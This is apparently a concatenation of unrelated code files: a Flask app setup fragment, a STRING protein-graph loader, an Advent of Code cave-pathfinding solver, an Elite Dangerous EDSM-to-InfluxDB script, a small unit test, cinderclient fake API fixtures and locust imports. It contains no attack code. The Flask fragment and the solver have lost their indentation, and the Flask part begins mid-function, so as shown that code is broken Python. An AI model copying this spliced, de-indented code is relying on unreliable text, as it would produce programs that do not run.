Scss(app, static_dir='app/static', asset_dir='app/assets')
# Setup Flask-SQLAlchemy
db.init_app(app)
# Setup Flask-Migrate
migrate.init_app(app, db)
# Setup Flask-Mail
mail.init_app(app)
# Setup Flask-Admin
flask_admin.init_app(app)
# Setup WTForms CSRFProtect
csrf_protect.init_app(app)
# Register REST Api
from app.services import register_blueprints as register_api
    register_api(app, url_prefix="/api", exempt_from_csrf=True, csrf_protect=csrf_protect)
# Register views
from app.views import register_blueprints as register_view
register_view(app, url_prefix="")
# app.logger.info(app.url_map)
# Define bootstrap_is_hidden_field for flask-bootstrap's bootstrap_wtf.html
from wtforms.fields import HiddenField
def is_hidden_field_filter(field):
return isinstance(field, HiddenField)
app.jinja_env.globals['bootstrap_is_hidden_field'] = is_hidden_field_filter
# Setup an error-logger to send emails to app.config.ADMINS
init_email_error_handler(app)
# Setup Flask-User to handle user account related forms
from .models.user_models import User
#from .views.main_views import user_profile_page
# Setup Flask-User
user_manager = UserManager(app, db, User)
# registers all jinja template extensions
from app import template_extensions
# enable CSRF-Protection for all view urls and only exclude /user and /api
"""
remove CSRF check from all requests with settings.py
via WTF_CSRF_CHECK_DEFAULT to False
and only add it to the view requests:
"""
@app.before_request
def check_csrf():
if not request.path.startswith('/user') and not request.path.startswith('/api'):
app.logger.debug(f"CSRF protecting path {request.path}")
csrf_protect.protect()
# for key in app.config:
# app.logger.info(f"{key} {app.config[key]}")
if not app.debug:
users = []
with app.app_context():
# init db
db.create_all()
from app.models.user_models import User
users = db.session.query(User).all()
# check if there are already technical users existing (if so, then this is not the first boot)
            no_technical_admin = not any(any(role.name == 'admin' for role in user.roles) for user in users)
app.logger.info(f"No technical admin present? {no_technical_admin}")
# create default admin if no user exist
if no_technical_admin:
from app.commands.init_db import create_roles
create_roles()
# create the default flask admin
from app.models.user_models import Role
from app.controllers import user_controller
all_roles = Role.query.all()
# app.logger.info(f"Creating admin with attributes: 'Admin', 'Admin', {app.config['ADMIN']}, {app.config['ADMIN_PW']}, {all_roles}")
default_admin_user = user_controller.create_user('Admin', 'Admin', app.config['ADMIN'], app.config['ADMIN_PW'], all_roles)
return app
def init_email_error_handler(app):
"""
Initialize a logger to send emails on error-level messages.
Unhandled exceptions will now send an email message to app.config.ADMINS.
"""
if app.debug: return # Do not send error emails while developing
# Retrieve email settings from app.config
host = app.config['MAIL_SERVER']
port = app.config['MAIL_PORT']
from_addr = app.config['MAIL_DEFAULT_SENDER']
username = app.config['MAIL_USERNAME']
password = app.config['MAIL_PASSWORD']
secure = () if app.config.get('MAIL_USE_TLS') else None
# Retrieve app settings from app.config
to_addr_list = app.config['ADMIN']
subject = app.config.get('APP_SYSTEM_ERROR_SUBJECT_LINE', 'System Error')
# Setup an SMTP mail handler for error-level messages
import logging
from logging.handlers import SMTPHandler
mail_handler = SMTPHandler(
mailhost=(host, port), # Mail host and port
fromaddr=from_addr, # From address
toaddrs=to_addr_list, # To address
subject=subject, # Subject line
credentials=(username, password), # Credentials
secure=secure,
)
mail_handler.setLevel(logging.ERROR)
app.logger.addHandler(mail_handler)
# Log errors using: app.logger.error('Some error message')
|
the-stack_106_16877
|
"""
This file offers the methods to automatically retrieve the graph Deltaproteobacteria bacterium RIFCSPLOWO2_12_FULL_40_28.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def DeltaproteobacteriaBacteriumRifcsplowo212Full4028(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Deltaproteobacteria bacterium RIFCSPLOWO2_12_FULL_40_28 graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
        Whether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
        Whether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
    Instance of Deltaproteobacteria bacterium RIFCSPLOWO2_12_FULL_40_28 graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
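    Usage example (a sketch; the first call downloads and preprocesses the graph,
    which can take a while, and later calls reuse the local cache):
        graph = DeltaproteobacteriaBacteriumRifcsplowo212Full4028()
        print(graph)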
"""
return AutomaticallyRetrievedGraph(
graph_name="DeltaproteobacteriaBacteriumRifcsplowo212Full4028",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
|
the-stack_106_16879
|
#!/usr/bin/env python3
import re
import heapq
with open("input.txt") as f:
depth_line, target_line = f.read().strip().split("\n")
depth = int(re.findall("[0-9]+", depth_line)[0])
coords = re.findall("[0-9]+", target_line)
tx, ty = int(coords[0]), int(coords[1])
erosion = {}
# just go way beyond the target, hope it's big enough
# doesn't take very long to compute
for y in range(1000):
for x in range(2000):
if x == y == 0:
gi = 0
elif x == tx and y == ty:
gi = 0
elif y == 0:
gi = x * 16807
elif x == 0:
gi = y * 48271
else:
gi = erosion[(x - 1, y)] * erosion[(x, y - 1)]
erosion_level = (gi + depth) % 20183
erosion[(x, y)] = erosion_level
GEAR_TORCH = 0
GEAR_CLIMBING = 1
GEAR_NONE = 2
REGION_ROCK = 0
REGION_WET = 1
REGION_NARROW = 2
def check_gear(region, gear_type):
if region == REGION_ROCK:
return gear_type in [GEAR_CLIMBING, GEAR_TORCH]
elif region == REGION_WET:
return gear_type in [GEAR_CLIMBING, GEAR_NONE]
elif region == REGION_NARROW:
return gear_type in [GEAR_TORCH, GEAR_NONE]
assert False, "bad region value to check_gear"
reached = set() # ((x, y), gear_type)
q = [
(0, (0, 0), GEAR_TORCH)
] # (time, (x, y), gear_type), sorted by time (ties safely arbitrary)
heapq.heapify(q) # a min heap
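# Dijkstra over (position, gear) states: moves cost 1 minute, gear changes cost 7,
# and the min-heap always pops the state with the lowest elapsed time first.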
while q:
t, (x, y), gear_type = heapq.heappop(q)
if gear_type == GEAR_TORCH and x == tx and y == ty:
print(t)
break
if ((x, y), gear_type) in reached:
continue
reached.add(((x, y), gear_type))
region_type = erosion[(x, y)] % 3
# Spawn changers
for change_gear in [GEAR_TORCH, GEAR_CLIMBING, GEAR_NONE]:
if check_gear(region_type, change_gear):
heapq.heappush(q, (t + 7, (x, y), change_gear))
if x + 1 < 2000 and check_gear(erosion[(x + 1, y)] % 3, gear_type):
heapq.heappush(q, (t + 1, (x + 1, y), gear_type))
if x - 1 >= 0 and check_gear(erosion[(x - 1, y)] % 3, gear_type):
heapq.heappush(q, (t + 1, (x - 1, y), gear_type))
    if y + 1 < 1000 and check_gear(erosion[(x, y + 1)] % 3, gear_type):
heapq.heappush(q, (t + 1, (x, y + 1), gear_type))
if y - 1 >= 0 and check_gear(erosion[(x, y - 1)] % 3, gear_type):
heapq.heappush(q, (t + 1, (x, y - 1), gear_type))
|
the-stack_106_16882
|
#!/usr/bin/python3
# Copyright (C) 2020 Sam Steele
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests, requests_cache, sys, math
from datetime import datetime, date, timedelta
from influxdb import InfluxDBClient
from influxdb.exceptions import InfluxDBClientError
EDSM_API_KEY = ''
EDSM_COMMANDER_NAME = ''
INFLUXDB_HOST = 'localhost'
INFLUXDB_PORT = 8086
INFLUXDB_USERNAME = 'root'
INFLUXDB_PASSWORD = 'root'
INFLUXDB_DATABASE = 'edsm'
points = []
last = None
def add_rank(data, activity):
global points
points.append({
"measurement": "rank",
"time": date.today().isoformat() + "T00:00:00",
"tags": {
"commander": EDSM_COMMANDER_NAME,
"activity": activity
},
"fields": {
"value": data['ranks'][activity],
"progress": data['progress'][activity],
"name": data['ranksVerbose'][activity]
}
})
def fetch_system(name):
try:
response = requests.get('https://www.edsm.net/api-v1/system',
params={'systemName':name, 'showCoordinates':1, 'showPrimaryStar':1, 'apiKey':EDSM_API_KEY})
response.raise_for_status()
except requests.exceptions.HTTPError as err:
print("HTTP request failed: %s" % (err))
sys.exit()
return response.json()
def distance(system1, system2):
s1 = fetch_system(system1)
s2 = fetch_system(system2)
dx = float(s1['coords']['x']) - float(s2['coords']['x'])
dy = float(s1['coords']['y']) - float(s2['coords']['y'])
dz = float(s1['coords']['z']) - float(s2['coords']['z'])
return math.sqrt(dx*dx + dy*dy + dz*dz)
def add_jump(src, dst):
global points
system = fetch_system(dst['system'])
if 'type' in system['primaryStar']:
points.append({
"measurement": "jump",
"time": datetime.fromisoformat(dst['date']).isoformat(),
"tags": {
"commander": EDSM_COMMANDER_NAME,
"system": dst['system'],
"firstDiscover": dst['firstDiscover'],
"primaryStarType": system['primaryStar']['type']
},
"fields": {
"distance": distance(src['system'], dst['system']),
"x": float(system['coords']['x']),
"y": float(system['coords']['y']),
"z": float(system['coords']['z'])
}
})
else:
points.append({
"measurement": "jump",
"time": datetime.fromisoformat(dst['date']).isoformat(),
"tags": {
"commander": EDSM_COMMANDER_NAME,
"system": dst['system'],
"firstDiscover": dst['firstDiscover']
},
"fields": {
"distance": distance(src['system'], dst['system']),
"x": float(system['coords']['x']),
"y": float(system['coords']['y']),
"z": float(system['coords']['z'])
}
})
def fetch_jumps(time):
global last
try:
response = requests.get('https://www.edsm.net/api-logs-v1/get-logs',
params={'commanderName':EDSM_COMMANDER_NAME, 'apiKey':EDSM_API_KEY, 'endDateTime':time})
response.raise_for_status()
except requests.exceptions.HTTPError as err:
print("HTTP request failed: %s" % (err))
sys.exit()
data = response.json()
print("Got %s jumps from EDSM" % (len(data['logs'])))
for jump in data['logs']:
if last != None:
add_jump(jump, last)
last = jump
return data
try:
client = InfluxDBClient(host=INFLUXDB_HOST, port=INFLUXDB_PORT, username=INFLUXDB_USERNAME, password=INFLUXDB_PASSWORD)
client.create_database(INFLUXDB_DATABASE)
client.switch_database(INFLUXDB_DATABASE)
except InfluxDBClientError as err:
print("InfluxDB connection failed: %s" % (err))
sys.exit()
try:
response = requests.get('https://www.edsm.net/api-commander-v1/get-credits',
params={'commanderName':EDSM_COMMANDER_NAME, 'apiKey':EDSM_API_KEY})
response.raise_for_status()
except requests.exceptions.HTTPError as err:
print("HTTP request failed: %s" % (err))
sys.exit()
data = response.json()
print("Got credits from EDSM")
for credits in data['credits']:
points.append({
"measurement": "credits",
"time": datetime.fromisoformat(credits['date']).isoformat(),
"tags": {
"commander": EDSM_COMMANDER_NAME
},
"fields": {
"value": credits['balance']
}
})
try:
response = requests.get('https://www.edsm.net/api-commander-v1/get-ranks',
params={'commanderName':EDSM_COMMANDER_NAME, 'apiKey':EDSM_API_KEY})
response.raise_for_status()
except requests.exceptions.HTTPError as err:
print("HTTP request failed: %s" % (err))
sys.exit()
data = response.json()
print("Got ranks from EDSM")
add_rank(data, "Combat")
add_rank(data, "Trade")
add_rank(data, "Explore")
add_rank(data, "CQC")
add_rank(data, "Federation")
add_rank(data, "Empire")
requests_cache.install_cache('edsm')
data = fetch_jumps(date.today().isoformat() + " 00:00:00")
if len(data['logs']) > 0:
data = fetch_jumps(data['startDateTime'])
while len(data['logs']) == 0:
data = fetch_jumps(data['startDateTime'])
try:
client.write_points(points)
except InfluxDBClientError as err:
print("Unable to write points to InfluxDB: %s" % (err))
sys.exit()
print("Successfully wrote %s data points to InfluxDB" % (len(points)))
|
the-stack_106_16883
|
import unittest
import result
class TestCodeSlice(unittest.TestCase):
SOURCE_CODE = "#include <stdio.h>\n" \
"\n" \
"int main(void) {\n" \
" printf(\"Hello, world!\\n\");\n" \
" \n" \
" return 0;\n" \
"}\n" \
"\n"
def test_get_code_from(self):
code_slice = result.CodeSlice(
result.CodePosition(4, 3),
result.CodePosition(6, 8),
)
res = code_slice.get_code_from(TestCodeSlice.SOURCE_CODE)
self.assertEqual("printf(\"Hello, world!\\n\");\n"
" \n"
" return\n",
res)
if __name__ == '__main__':
unittest.main()
|
the-stack_106_16885
|
# Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from cinderclient.tests.unit import fakes
from cinderclient.v3 import client
from cinderclient.tests.unit.v2 import fakes as fake_v2
def _stub_group(detailed=True, **kwargs):
group = {
"name": "test-1",
"id": "1234",
}
if detailed:
details = {
"created_at": "2012-08-28T16:30:31.000000",
"description": "test-1-desc",
"availability_zone": "zone1",
"status": "available",
"group_type": "my_group_type",
}
group.update(details)
group.update(kwargs)
return group
def _stub_group_snapshot(detailed=True, **kwargs):
group_snapshot = {
"name": None,
"id": "5678",
}
if detailed:
details = {
"created_at": "2012-08-28T16:30:31.000000",
"description": None,
"name": None,
"id": "5678",
"status": "available",
"group_id": "1234",
}
group_snapshot.update(details)
group_snapshot.update(kwargs)
return group_snapshot
def _stub_snapshot(**kwargs):
snapshot = {
"created_at": "2012-08-28T16:30:31.000000",
"display_description": None,
"display_name": None,
"id": '11111111-1111-1111-1111-111111111111',
"size": 1,
"status": "available",
"volume_id": '00000000-0000-0000-0000-000000000000',
}
snapshot.update(kwargs)
return snapshot
class FakeClient(fakes.FakeClient, client.Client):
def __init__(self, api_version=None, *args, **kwargs):
client.Client.__init__(self, 'username', 'password',
'project_id', 'auth_url',
extensions=kwargs.get('extensions'))
self.api_version = api_version
global_id = "req-f551871a-4950-4225-9b2c-29a14c8f075e"
self.client = FakeHTTPClient(api_version=api_version,
global_request_id=global_id, **kwargs)
def get_volume_api_version_from_endpoint(self):
return self.client.get_volume_api_version_from_endpoint()
class FakeHTTPClient(fake_v2.FakeHTTPClient):
def __init__(self, **kwargs):
super(FakeHTTPClient, self).__init__()
self.management_url = 'http://10.0.2.15:8776/v3/fake'
vars(self).update(kwargs)
#
# Services
#
def get_os_services(self, **kw):
host = kw.get('host', None)
binary = kw.get('binary', None)
services = [
{
'id': 1,
'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'enabled',
'state': 'up',
'updated_at': datetime(2012, 10, 29, 13, 42, 2),
'cluster': 'cluster1',
},
{
'id': 2,
'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime(2012, 9, 18, 8, 3, 38),
'cluster': 'cluster1',
},
{
'id': 3,
'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime(2012, 9, 18, 8, 3, 38),
'cluster': 'cluster2',
},
]
if host:
services = [i for i in services if i['host'] == host]
if binary:
services = [i for i in services if i['binary'] == binary]
if not self.api_version.matches('3.7'):
for svc in services:
del svc['cluster']
return (200, {}, {'services': services})
#
# Clusters
#
def _filter_clusters(self, return_keys, **kw):
        date = datetime(2012, 10, 29, 13, 42, 2)
clusters = [
{
'id': '1',
'name': 'cluster1@lvmdriver-1',
'state': 'up',
'status': 'enabled',
'binary': 'cinder-volume',
'is_up': 'True',
'disabled': 'False',
'disabled_reason': None,
'num_hosts': '3',
'num_down_hosts': '2',
'updated_at': date,
'created_at': date,
'last_heartbeat': date,
},
{
'id': '2',
'name': 'cluster1@lvmdriver-2',
'state': 'down',
'status': 'enabled',
'binary': 'cinder-volume',
'is_up': 'False',
'disabled': 'False',
'disabled_reason': None,
'num_hosts': '2',
'num_down_hosts': '2',
'updated_at': date,
'created_at': date,
'last_heartbeat': date,
},
{
'id': '3',
'name': 'cluster2',
'state': 'up',
'status': 'disabled',
'binary': 'cinder-backup',
'is_up': 'True',
'disabled': 'True',
'disabled_reason': 'Reason',
'num_hosts': '1',
'num_down_hosts': '0',
'updated_at': date,
'created_at': date,
'last_heartbeat': date,
},
]
for key, value in kw.items():
clusters = [cluster for cluster in clusters
if cluster[key] == str(value)]
result = []
for cluster in clusters:
result.append({key: cluster[key] for key in return_keys})
return result
CLUSTER_SUMMARY_KEYS = ('name', 'binary', 'state', 'status')
CLUSTER_DETAIL_KEYS = (CLUSTER_SUMMARY_KEYS +
('num_hosts', 'num_down_hosts', 'last_heartbeat',
'disabled_reason', 'created_at', 'updated_at'))
def get_clusters(self, **kw):
clusters = self._filter_clusters(self.CLUSTER_SUMMARY_KEYS, **kw)
return (200, {}, {'clusters': clusters})
def get_clusters_detail(self, **kw):
clusters = self._filter_clusters(self.CLUSTER_DETAIL_KEYS, **kw)
return (200, {}, {'clusters': clusters})
def get_clusters_1(self):
res = self.get_clusters_detail(id=1)
return (200, {}, {'cluster': res[2]['clusters'][0]})
def put_clusters_enable(self, body):
res = self.get_clusters(id=1)
return (200, {}, {'cluster': res[2]['clusters'][0]})
def put_clusters_disable(self, body):
res = self.get_clusters(id=3)
return (200, {}, {'cluster': res[2]['clusters'][0]})
#
# Backups
#
def put_backups_1234(self, **kw):
backup = fake_v2._stub_backup(
id='1234',
base_uri='http://localhost:8776',
tenant_id='0fa851f6668144cf9cd8c8419c1646c1')
return (200, {},
{'backups': backup})
#
# Attachments
#
def post_attachments(self, **kw):
return (202, {}, {
'attachment': {'instance': 1234,
'name': 'attachment-1',
'volume_id': 'fake_volume_1',
'status': 'reserved'}})
def get_attachments(self, **kw):
return (200, {}, {
'attachments': [{'instance': 1,
'name': 'attachment-1',
'volume_id': 'fake_volume_1',
'status': 'reserved'},
{'instance': 2,
'name': 'attachment-2',
'volume_id': 'fake_volume_2',
                             'status': 'reserved'}]})
def get_attachments_1234(self, **kw):
return (200, {}, {
'attachment': {'instance': 1234,
'name': 'attachment-1',
'volume_id': 'fake_volume_1',
'status': 'reserved'}})
def put_attachments_1234(self, **kw):
return (200, {}, {
'attachment': {'instance': 1234,
'name': 'attachment-1',
'volume_id': 'fake_volume_1',
'status': 'reserved'}})
def delete_attachments_1234(self, **kw):
return 204, {}, None
#
# GroupTypes
#
def get_group_types(self, **kw):
return (200, {}, {
'group_types': [{'id': 1,
'name': 'test-type-1',
'description': 'test_type-1-desc',
'group_specs': {}},
{'id': 2,
'name': 'test-type-2',
'description': 'test_type-2-desc',
'group_specs': {}}]})
def get_group_types_1(self, **kw):
return (200, {}, {'group_type': {'id': 1,
'name': 'test-type-1',
'description': 'test_type-1-desc',
'group_specs': {u'key': u'value'}}})
def get_group_types_2(self, **kw):
return (200, {}, {'group_type': {'id': 2,
'name': 'test-type-2',
'description': 'test_type-2-desc',
'group_specs': {}}})
def get_group_types_3(self, **kw):
return (200, {}, {'group_type': {'id': 3,
'name': 'test-type-3',
'description': 'test_type-3-desc',
'group_specs': {},
'is_public': False}})
def get_group_types_default(self, **kw):
return self.get_group_types_1()
def post_group_types(self, body, **kw):
return (202, {}, {'group_type': {'id': 3,
'name': 'test-type-3',
'description': 'test_type-3-desc',
'group_specs': {}}})
def post_group_types_1_group_specs(self, body, **kw):
assert list(body) == ['group_specs']
return (200, {}, {'group_specs': {'k': 'v'}})
def delete_group_types_1_group_specs_k(self, **kw):
return(204, {}, None)
def delete_group_types_1_group_specs_m(self, **kw):
return(204, {}, None)
def delete_group_types_1(self, **kw):
return (202, {}, None)
def delete_group_types_3_group_specs_k(self, **kw):
return(204, {}, None)
def delete_group_types_3(self, **kw):
return (202, {}, None)
def put_group_types_1(self, **kw):
return self.get_group_types_1()
#
# Groups
#
def get_groups_detail(self, **kw):
return (200, {}, {"groups": [
_stub_group(id='1234'),
_stub_group(id='4567')]})
def get_groups(self, **kw):
return (200, {}, {"groups": [
_stub_group(detailed=False, id='1234'),
_stub_group(detailed=False, id='4567')]})
def get_groups_1234(self, **kw):
return (200, {}, {'group':
_stub_group(id='1234')})
def post_groups(self, **kw):
group = _stub_group(id='1234', group_type='my_group_type',
volume_types=['type1', 'type2'])
return (202, {}, {'group': group})
def put_groups_1234(self, **kw):
return (200, {}, {'group': {}})
def post_groups_1234_action(self, body, **kw):
resp = 202
assert len(list(body)) == 1
action = list(body)[0]
if action == 'delete':
assert 'delete-volumes' in body[action]
elif action in ('enable_replication', 'disable_replication',
'failover_replication', 'list_replication_targets'):
assert action in body
else:
raise AssertionError("Unexpected action: %s" % action)
return (resp, {}, {})
def post_groups_action(self, body, **kw):
group = _stub_group(id='1234', group_type='my_group_type',
volume_types=['type1', 'type2'])
resp = 202
assert len(list(body)) == 1
action = list(body)[0]
if action == 'create-from-src':
assert ('group_snapshot_id' in body[action] or
'source_group_id' in body[action])
else:
raise AssertionError("Unexpected action: %s" % action)
return (resp, {}, {'group': group})
#
# group_snapshots
#
def get_group_snapshots_detail(self, **kw):
return (200, {}, {"group_snapshots": [
_stub_group_snapshot(id='1234'),
_stub_group_snapshot(id='4567')]})
def get_group_snapshots(self, **kw):
return (200, {}, {"group_snapshots": [
_stub_group_snapshot(detailed=False, id='1234'),
_stub_group_snapshot(detailed=False, id='4567')]})
def get_group_snapshots_1234(self, **kw):
return (200, {}, {'group_snapshot': _stub_group_snapshot(id='1234')})
def get_group_snapshots_5678(self, **kw):
return (200, {}, {'group_snapshot': _stub_group_snapshot(id='5678')})
def post_group_snapshots(self, **kw):
group_snap = _stub_group_snapshot()
return (202, {}, {'group_snapshot': group_snap})
def put_group_snapshots_1234(self, **kw):
return (200, {}, {'group_snapshot': {}})
def post_groups_1234_action(self, **kw):
return (202, {}, {})
def get_groups_5678(self, **kw):
return (200, {}, {'group':
_stub_group(id='5678')})
def post_groups_5678_action(self, **kw):
return (202, {}, {})
def post_snapshots_1234_action(self, **kw):
return (202, {}, {})
def get_snapshots_1234(self, **kw):
return (200, {}, {'snapshot': _stub_snapshot(id='1234')})
def post_snapshots_5678_action(self, **kw):
return (202, {}, {})
def get_snapshots_5678(self, **kw):
return (200, {}, {'snapshot': _stub_snapshot(id='5678')})
def post_group_snapshots_1234_action(self, **kw):
return (202, {}, {})
def post_group_snapshots_5678_action(self, **kw):
return (202, {}, {})
def get_group_snapshots_5678(self, **kw):
return (200, {}, {'group_snapshot': _stub_group_snapshot(id='5678')})
def delete_group_snapshots_1234(self, **kw):
return (202, {}, {})
#
# Manageable volumes/snapshots
#
def get_manageable_volumes(self, **kw):
vol_id = "volume-ffffffff-0000-ffff-0000-ffffffffffff"
vols = [{"size": 4, "safe_to_manage": False, "actual_size": 4.0,
"reference": {"source-name": vol_id}},
{"size": 5, "safe_to_manage": True, "actual_size": 4.3,
"reference": {"source-name": "myvol"}}]
return (200, {}, {"manageable-volumes": vols})
def get_manageable_volumes_detail(self, **kw):
vol_id = "volume-ffffffff-0000-ffff-0000-ffffffffffff"
vols = [{"size": 4, "reason_not_safe": "volume in use",
"safe_to_manage": False, "extra_info": "qos_setting:high",
"reference": {"source-name": vol_id},
"actual_size": 4.0},
{"size": 5, "reason_not_safe": None, "safe_to_manage": True,
"extra_info": "qos_setting:low", "actual_size": 4.3,
"reference": {"source-name": "myvol"}}]
return (200, {}, {"manageable-volumes": vols})
def get_manageable_snapshots(self, **kw):
snap_id = "snapshot-ffffffff-0000-ffff-0000-ffffffffffff"
snaps = [{"actual_size": 4.0, "size": 4,
"safe_to_manage": False, "source_id_type": "source-name",
"source_cinder_id": "00000000-ffff-0000-ffff-00000000",
"reference": {"source-name": snap_id},
"source_identifier": "volume-00000000-ffff-0000-ffff-000000"},
{"actual_size": 4.3, "reference": {"source-name": "mysnap"},
"source_id_type": "source-name", "source_identifier": "myvol",
"safe_to_manage": True, "source_cinder_id": None, "size": 5}]
return (200, {}, {"manageable-snapshots": snaps})
def get_manageable_snapshots_detail(self, **kw):
snap_id = "snapshot-ffffffff-0000-ffff-0000-ffffffffffff"
snaps = [{"actual_size": 4.0, "size": 4,
"safe_to_manage": False, "source_id_type": "source-name",
"source_cinder_id": "00000000-ffff-0000-ffff-00000000",
"reference": {"source-name": snap_id},
"source_identifier": "volume-00000000-ffff-0000-ffff-000000",
"extra_info": "qos_setting:high",
"reason_not_safe": "snapshot in use"},
{"actual_size": 4.3, "reference": {"source-name": "mysnap"},
"safe_to_manage": True, "source_cinder_id": None,
"source_id_type": "source-name", "identifier": "mysnap",
"source_identifier": "myvol", "size": 5,
"extra_info": "qos_setting:low", "reason_not_safe": None}]
return (200, {}, {"manageable-snapshots": snaps})
#
# Messages
#
def get_messages(self, **kw):
return 200, {}, {'messages': [
{
'id': '1234',
'event_id': 'VOLUME_000002',
'user_message': 'Fake Message',
'created_at': '2012-08-27T00:00:00.000000',
'guaranteed_until': "2013-11-12T21:00:00.000000",
},
{
'id': '12345',
'event_id': 'VOLUME_000002',
'user_message': 'Fake Message',
'created_at': '2012-08-27T00:00:00.000000',
'guaranteed_until': "2013-11-12T21:00:00.000000",
}
]}
def delete_messages_1234(self, **kw):
return 204, {}, None
def delete_messages_12345(self, **kw):
return 204, {}, None
def get_messages_1234(self, **kw):
message = {
'id': '1234',
'event_id': 'VOLUME_000002',
'user_message': 'Fake Message',
'created_at': '2012-08-27T00:00:00.000000',
'guaranteed_until': "2013-11-12T21:00:00.000000",
}
return 200, {}, {'message': message}
def get_messages_12345(self, **kw):
message = {
'id': '12345',
'event_id': 'VOLUME_000002',
'user_message': 'Fake Message',
'created_at': '2012-08-27T00:00:00.000000',
'guaranteed_until': "2013-11-12T21:00:00.000000",
}
return 200, {}, {'message': message}
def put_os_services_set_log(self, body):
return (202, {}, {})
def put_os_services_get_log(self, body):
levels = [{'binary': 'cinder-api', 'host': 'host1',
'levels': {'prefix1': 'DEBUG', 'prefix2': 'INFO'}},
{'binary': 'cinder-volume', 'host': 'host@backend#pool',
'levels': {'prefix3': 'WARNING', 'prefix4': 'ERROR'}}]
return (200, {}, {'log_levels': levels})
def get_volumes_summary(self, **kw):
return 200, {}, {"volume-summary": {'total_size': 5,
'total_count': 5,
'metadata': {
"test_key": ["test_value"]
}
}
}
#
# resource filters
#
def get_resource_filters(self, **kw):
return 200, {}, {'resource_filters': []}
def fake_request_get():
versions = {'versions': [{'id': 'v1.0',
'links': [{'href': 'http://docs.openstack.org/',
'rel': 'describedby',
'type': 'text/html'},
{'href': 'http://192.168.122.197/v1/',
'rel': 'self'}],
'media-types': [{'base': 'application/json',
'type': 'application/'}],
'min_version': '',
'status': 'DEPRECATED',
'updated': '2016-05-02T20:25:19Z',
'version': ''},
{'id': 'v2.0',
'links': [{'href': 'http://docs.openstack.org/',
'rel': 'describedby',
'type': 'text/html'},
{'href': 'http://192.168.122.197/v2/',
'rel': 'self'}],
'media-types': [{'base': 'application/json',
'type': 'application/'}],
'min_version': '',
'status': 'SUPPORTED',
'updated': '2014-06-28T12:20:21Z',
'version': ''},
{'id': 'v3.0',
'links': [{'href': 'http://docs.openstack.org/',
'rel': 'describedby',
'type': 'text/html'},
{'href': 'http://192.168.122.197/v3/',
'rel': 'self'}],
'media-types': [{'base': 'application/json',
'type': 'application/'}],
'min_version': '3.0',
'status': 'CURRENT',
'updated': '2016-02-08T12:20:21Z',
'version': '3.16'}]}
return versions
def fake_request_get_no_v3():
versions = {'versions': [{'id': 'v1.0',
'links': [{'href': 'http://docs.openstack.org/',
'rel': 'describedby',
'type': 'text/html'},
{'href': 'http://192.168.122.197/v1/',
'rel': 'self'}],
'media-types': [{'base': 'application/json',
'type': 'application/'}],
'min_version': '',
'status': 'DEPRECATED',
'updated': '2016-05-02T20:25:19Z',
'version': ''},
{'id': 'v2.0',
'links': [{'href': 'http://docs.openstack.org/',
'rel': 'describedby',
'type': 'text/html'},
{'href': 'http://192.168.122.197/v2/',
'rel': 'self'}],
'media-types': [{'base': 'application/json',
'type': 'application/'}],
'min_version': '',
'status': 'SUPPORTED',
'updated': '2014-06-28T12:20:21Z',
'version': ''}]}
return versions
|
the-stack_106_16886
|
import datetime
import hashlib
import time
from collections import namedtuple, OrderedDict
from copy import copy
from itertools import chain
import os
import csv
import signal
import gevent
from .exception import StopUser, CatchResponseError
import logging
console_logger = logging.getLogger("locust.stats_logger")
